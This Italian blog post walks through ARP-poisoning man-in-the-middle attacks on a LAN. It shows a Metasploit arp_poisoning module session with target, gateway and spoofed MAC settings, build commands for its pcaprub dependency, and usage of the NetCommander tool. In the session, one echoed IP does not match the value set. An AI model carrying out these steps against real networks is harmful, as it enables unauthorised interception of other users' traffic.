[MITM] Tools for Arp Poisoning

May 11th, 2011 by clshack

Di questo tipo di attacco ne ho parlato davvero molto sul blog, per chi volesse approfondere:

Tutorials Arp Poisoning.

In backbox per effettuare questi attacchi ci sono già installati alcui tools:

• ettercap;
• yearsinia;
• metasploit;
• scapy;

Molti di voi non lo sanno ma metasploit ha da poco introdotto un modulo per effettuare questo attacco.
Un semplice esempio di come usarlo:
msf > use spoof/arp/arp_poisoning
msf auxiliary(arp_poisoning) > show options
,,,
msf auxiliary(arp_poisoning) > set DHOSTS 192.168.1.153
DHOSTS => 192.168.1.153
msf auxiliary(arp_poisoning) > set SMAC 48:5d:60:c8:20:2a
SMAC => 48:5d:60:c8:20:2a
msf auxiliary(arp_poisoning) > set SHOSTS 192.168.1.1
SHOSTS => 192.168.1.152
msf auxiliary(arp_poisoning) > run

Bisogna però installare alcune dipendenze.
Su backbox:
cd /opt/metasploit3/msf3/external/
cd pcaprub/
ruby extconf.rb
sudo ruby extconf.rb
sudo apt-get install ruby-dev
sudo ruby extconf.rb
sudo make && sudo make install
Comunque sconsiglio l’uso perchè la procedura non è molto intuitiva rispetto ad altri tools, bisogna specificare il mac adress etc.

Un altro tools molto interessante e semplice da usare scritto in python sfruttando il mio amato scapy è NetCommander, sviluppato da evilsocket:
https://github.com/evilsocket/NetCommander
La sua sintassi è molto semplice:
sudo python netcmd.py -I INTERFACE
Per un help:
python netcmd.py -h

Il risultato comunque è equivalente, se non ci sono misure di sicurezza:

Categorie: GNU/Linux, Hacking, Software
Tags: attack • backbox • evilsocket • lan • metasploit • spoof